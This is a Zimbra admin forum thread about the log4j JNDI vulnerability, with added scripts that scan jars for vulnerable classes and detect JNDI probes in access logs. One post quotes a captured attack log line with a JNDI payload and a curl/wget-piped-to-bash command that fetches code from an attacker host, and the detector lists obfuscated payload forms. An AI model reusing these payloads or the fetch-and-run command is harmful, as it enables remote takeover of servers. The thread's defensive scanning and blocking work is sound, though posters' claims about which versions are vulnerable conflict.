log4j-zero-day exploit - active attacks

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
irv
Posts: 7
Joined: Mon Jun 04, 2018 12:04 am

log4j-zero-day exploit - active attacks

Post by irv »

Hi

I need confirmation. Zimbra uses log4j, and now I got an alert from CVE with threat 10/10.
Is Zimbra affected, and if yes, to what extent and which versions of Zimbra servers are affected?



https://wiki.zimbra.com/wiki/Using_log4 ... xd_Logging

about exploit:
"unauthenticated RCE vulnerability allowing complete system takeover on systems with Log4j 2.0-beta9 up to 2.14.1"

https://www.bleepingcomputer.com/news/s ... nightmare/

how this is working:
https://www.lunasec.io/docs/blog/log4j-zero-day/
JDunphy
Outstanding Member
Posts: 899
Joined: Fri Sep 12, 2014 11:18 pm
Location: Victoria, BC
ZCS/ZD Version: 9.0.0_P39 NETWORK Edition

Re: log4j-zero-day exploit - active attacks

Post by JDunphy »

I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking IPs for ipsets, etc. GreyNoise is providing these in real time for IPs that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Posts: 58
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Post by pixelplumber »

This post on the Confluence community also suggests ver. 1.x is not vulnerable to the JNDI exploit, but I can't verify that.

Looking for log4j all I can see is:

# find / -name '*log4j*'
/opt/zimbra/common/jetty_home/modules/logging-log4j.mod
/opt/zimbra/common/jetty_home/modules/logging-log4j2.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j.mod
/opt/zimbra/common/jetty_home/modules/slf4j-log4j2.mod
/opt/zimbra/common/jetty_home/modules/log4j2-slf4j.mod
/opt/zimbra/common/jetty_home/modules/log4j-impl
/opt/zimbra/common/jetty_home/modules/log4j-impl/resources/log4j.xml
/opt/zimbra/common/jetty_home/modules/log4j-impl.mod
/opt/zimbra/common/jetty_home/modules/log4j2-api.mod
/opt/zimbra/common/jetty_home/modules/log4j2-impl
/opt/zimbra/common/jetty_home/modules/log4j2-impl/resources/log4j2.xml
/opt/zimbra/common/jetty_home/modules/log4j2-impl.mod
/opt/zimbra/conf/log4j.properties.in
/opt/zimbra/conf/milter.log4j.properties
/opt/zimbra/conf/zmconfigd.log4j.properties
/opt/zimbra/conf/log4j.properties
/opt/zimbra/lib/jars/apache-log4j-extras-1.0.jar
/opt/zimbra/lib/jars/slf4j-log4j12-1.7.30.jar
/opt/zimbra/lib/jars/log4j-1.2.16.jar
/opt/zimbra/lib/jars/syslog4j-0.9.46.jar
/opt/zimbra/log/zmconfigd-log4j.log
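A filename search like the one above only tells you which jars are named after log4j; it does not say what is inside them, and it misses log4j classes shaded into an application jar. The script below is an added example, not code from the thread or from Zimbra: it opens every jar under a directory (descending into jars nested inside jars), reads the Implementation-Version from the manifest, and reports jars that contain the log4j 2.x JndiLookup class (the CVE-2021-44228 indicator) or the log4j 1.x JMSAppender class (the 1.x component the GitHub issue linked later in the thread concerns). The sample tree it builds is constructed for the demo and does not reflect real Zimbra files; the directory layout under /opt/zimbra/lib/jars is only used as the assumed root.

```python
import io
import os
import re
import sys
import tempfile
import zipfile
from pathlib import Path

# Class whose presence marks a log4j 2.x core jar carrying the JNDI lookup (CVE-2021-44228 indicator).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Class present in log4j 1.2.x; JMSAppender is the 1.x component whose JNDI use was later reported separately.
JMS_APPENDER_CLASS = "org/apache/log4j/net/JMSAppender.class"


def inspect_zip(zf, label):
    """Return indicator records for one open zip and for any jars nested inside it."""
    names = set(zf.namelist())
    version = None
    if "META-INF/MANIFEST.MF" in names:
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
        m = re.search(r"^Implementation-Version:\s*(\S+)", manifest, re.M)
        if m:
            version = m.group(1)
    records = [{
        "path": label,
        "version": version,
        "has_jndi_lookup": JNDI_LOOKUP_CLASS in names,
        "has_jms_appender": JMS_APPENDER_CLASS in names,
    }]
    # Shaded/uber jars bundle other jars as entries; a plain `find` never sees those.
    for name in sorted(names):
        if name.endswith(".jar"):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    records.extend(inspect_zip(inner, f"{label}!{name}"))
            except zipfile.BadZipFile:
                pass
    return records


def scan_tree(root):
    """Walk root, inspect every .jar, and return only the records that carry an indicator class."""
    root = Path(root)
    hits = []
    for path in root.rglob("*.jar"):
        try:
            with zipfile.ZipFile(path) as zf:
                records = inspect_zip(zf, path.relative_to(root).as_posix())
        except zipfile.BadZipFile:
            continue
        hits.extend(r for r in records if r["has_jndi_lookup"] or r["has_jms_appender"])
    return sorted(hits, key=lambda r: r["path"])


def build_sample_tree(root):
    """Create a constructed sample tree (fixture only, not real Zimbra files) under root."""
    jars = Path(root) / "lib" / "jars"
    jars.mkdir(parents=True)
    stub_class = b"\xca\xfe\xba\xbe"  # class-file magic; content is irrelevant to the check
    with zipfile.ZipFile(jars / "log4j-core-2.14.1.jar", "w") as zf:  # hypothetical 2.x jar
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nImplementation-Version: 2.14.1\n")
        zf.writestr(JNDI_LOOKUP_CLASS, stub_class)
    with zipfile.ZipFile(jars / "log4j-1.2.16.jar", "w") as zf:  # same name as the jar found above
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nImplementation-Version: 1.2.16\n")
        zf.writestr(JMS_APPENDER_CLASS, stub_class)
    inner = io.BytesIO()  # an application jar that nests a log4j core jar
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, stub_class)
    with zipfile.ZipFile(jars / "app-bundle.jar", "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("lib/log4j-core-2.13.0.jar", inner.getvalue())
    with zipfile.ZipFile(jars / "syslog4j-0.9.46.jar", "w") as zf:  # unrelated jar, must not be reported
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        zf.writestr("org/productivity/java/syslog4j/Syslog.class", stub_class)


def demo():
    """Build the constructed tree in a temp dir, scan it, and return the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return scan_tree(tmp)


if __name__ == "__main__":
    # Real use: python scan_jars.py /opt/zimbra/lib/jars  (assumed root; defaults to the demo tree)
    hits = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for h in hits:
        flags = [k for k in ("has_jndi_lookup", "has_jms_appender") if h[k]]
        print(f"{h['path']}  version={h['version']}  {' '.join(flags)}")
```

A hit on JndiLookup.class in a 2.x jar is the condition the hash databases in the thread are looking for; a hit on JMSAppender in a 1.x jar is only a pointer to check how that appender is configured, which this script does not do. Run it against the real tree with `python scan_jars.py /opt/zimbra/lib/jars` and read the nested `outer.jar!inner.jar` paths as the ones a filename search would have missed.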
irv
Posts: 7
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Post by irv »

Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I am looking for the VMware KB to be updated and for patches.

I have an old Zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.


JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes

List of attacking IPs for ipsets, etc. GreyNoise is providing these in real time for IPs that are actively attacking.
Ref: https://gist.githubusercontent.com/gnre ... 28_IPs.csv

Ref: https://blog.cloudflare.com/cve-2021-44 ... itigation/

Jim
pixelplumber
Advanced member
Posts: 58
Joined: Fri Sep 12, 2014 10:27 pm

Re: log4j-zero-day exploit - active attacks

Post by pixelplumber »

JDunphy wrote:I have been through this today and think we are ok but would be interested if others believe otherwise. Zimbra could you guys comment?

It appears to be versions log4j 2.0-beta9 thru 2.14.1 ... I have also found a hash database of various vulnerable libs and did a find on our systems for log4j libs and found no match for those. The only thing I found was:
apache-log4j-extras-1.0.jar, which I don't believe is a problem. Didn't find any that appear to be vulnerable. My references:

Ref: https://github.com/mubix/CVE-2021-44228 ... ell-Hashes
Jim
In Jim's link to the hashes above, they mention 1.x might be vulnerable too, with a link to this GitHub issue mentioning an avenue by which lookups could be triggered?
sigtrap
Posts: 22
Joined: Sat Sep 13, 2014 1:35 am

Re: log4j-zero-day exploit - active attacks

Post by sigtrap »

irv wrote:Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I am looking for the VMware KB to be updated and for patches.

I have an old Zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.
I have tested Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
irv
Posts: 7
Joined: Mon Jun 04, 2018 12:04 am

Re: log4j-zero-day exploit - active attacks

Post by irv »

45.155.205.233 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwg(......)}"
(curl -s 45.155.205.233:5874/(cut):80||wget -q -O- 45.155.205.233:5874/(cut):80)|bash

I found that, so it looks like they are trying.

I think fail2ban on the firewall + log monitoring can help temporarily to cut off those attacks.

sigtrap wrote:
irv wrote:Thanks for that .csv file. Just implemented a script to block those IPs on the firewalls.
And checking to see if my installations of Zimbra are affected.
I also have a couple of VMware systems, but I am looking for the VMware KB to be updated and for patches.

I have an old Zimbra running also.
Release 8.6.0.GA.1153.UBUNTU14.64 UBUNTU14_64 FOSS edition, Patch 8.6.0_P7.

And I wonder if that version is affected. Can anyone point me somewhere I could find some more details?

Thanks.
I have tested Zimbra 8.7.11 Patch11 and it looks vulnerable. Very easy attack vector.
(lib log4j-1.2.16.jar)
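The access-log line irv posted is what a probe looks like from the defender's side: the lookup string sits in the User-Agent, but it can equally arrive in the request path or the Referer, and scanners routinely wrap the `jndi` token in log4j's own `${lower:...}` / `${...:-x}` lookups so a literal match on `${jndi:` misses it. The following is an added example, not code from irv or any other poster: it parses combined-format access-log lines, normalises those wrappers, flags lines whose request, referer or user-agent contains a JNDI lookup, and collects the source IPs for an ipset or fail2ban-style block. The log lines are constructed (documentation-range addresses, payload replaced by a placeholder) and the field layout assumes the standard combined log format shown in the post.

```python
import re

# Wrappers that hide the token from naive matching: ${lower:j}, ${upper:J} and ${anything:-j}
# each resolve (in log4j 2.x lookup semantics) to the single wrapped character.
_WRAPPER = re.compile(r"\$\{(?:lower|upper):([^${}])\}|\$\{[^{}]*:-([^${}])\}", re.I)
# What we are actually looking for once wrappers are gone.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)
# Combined log format: ip ident user [ts] "request" status size "referer" "user-agent"
_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalise(text):
    """Collapse single-character lookup wrappers until the string stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _WRAPPER.sub(lambda m: (m.group(1) or m.group(2)).lower(), text)
    return text


def scan_line(line):
    """Return a finding dict for one log line, or None if it parses cleanly and carries no lookup."""
    m = _LOG.match(line)
    if not m:
        return None  # not combined format; a real deployment would count these separately
    for field in ("request", "referer", "ua"):
        if _JNDI_LOOKUP.search(normalise(m.group(field))):
            return {"ip": m.group("ip"), "field": field, "status": int(m.group("status"))}
    return None


def scan_log(lines):
    """Findings for every line that carries a JNDI lookup, in log order."""
    return [f for f in (scan_line(l) for l in lines) if f]


def offending_ips(lines):
    """Sorted, de-duplicated source addresses, ready to feed to an ipset or firewall rule."""
    return sorted({f["ip"] for f in scan_log(lines)})


# Constructed sample lines (RFC 5737 addresses, placeholder paths); the first mirrors the
# shape of the line quoted in the thread with the address and payload replaced.
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Dec/2021:14:23:29 +0100] "GET / HTTP/1.1" 200 300 "-" '
    '"${jndi:ldap://192.0.2.10:1389/PLACEHOLDER}"',
    '192.0.2.11 - - [10/Dec/2021:14:25:01 +0100] '
    '"GET /?x=${${lower:j}ndi:ldap://192.0.2.11:1389/PLACEHOLDER} HTTP/1.1" 404 150 "-" "Mozilla/5.0"',
    '192.0.2.12 - - [10/Dec/2021:14:26:44 +0100] '
    '"GET /?q=${${::-j}${::-n}${::-d}${::-i}:ldap://192.0.2.12:1389/PLACEHOLDER} HTTP/1.1" 200 300 "-" "curl/7.68.0"',
    '198.51.100.7 - - [10/Dec/2021:14:27:10 +0100] "GET /zimbra/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [10/Dec/2021:14:28:03 +0100] "GET /docs/jndi-overview HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']}  field={f['field']}  status={f['status']}")
    print("block:", " ".join(offending_ips(SAMPLE_LOG)))
```

Two points worth keeping in mind when wiring this into fail2ban: a plain failregex runs on the raw line, so it only catches the literal `${jndi:` form unless you add patterns for the wrapped forms too, and the HTTP status is irrelevant to the decision (the first sample line returned 200, yet the string was still passed to whatever logged it). Blocking the probing address is a stopgap; it does nothing for a request that already reached a vulnerable logger.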
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Post by PL123 »

Can confirm Zimbra 8.8.15_GA_4177 is vulnerable as well.
L. Mark Stone
Ambassador
Posts: 2802
Joined: Wed Oct 09, 2013 11:35 am
Location: Portland, Maine, US
ZCS/ZD Version: 10.0.7 Network Edition

Re: log4j-zero-day exploit - active attacks

Post by L. Mark Stone »

I opened a Support Case with Zimbra on this earlier today. Zimbra have reported back to me that the 1.2.16 version of Log4j used by Zimbra is NOT subject to this exploit.

If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.

All the best,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
AWS Certified Solutions Architect-Associate
PL123
Posts: 3
Joined: Fri Dec 10, 2021 10:59 pm

Re: log4j-zero-day exploit - active attacks

Post by PL123 »

L. Mark Stone wrote: If anyone can prove otherwise, please send me a private message and I will get this escalated within Synacor.
I don't see an option to send you a PM. Might be because my account is new or something. I am happy to send you info to replicate it yourself.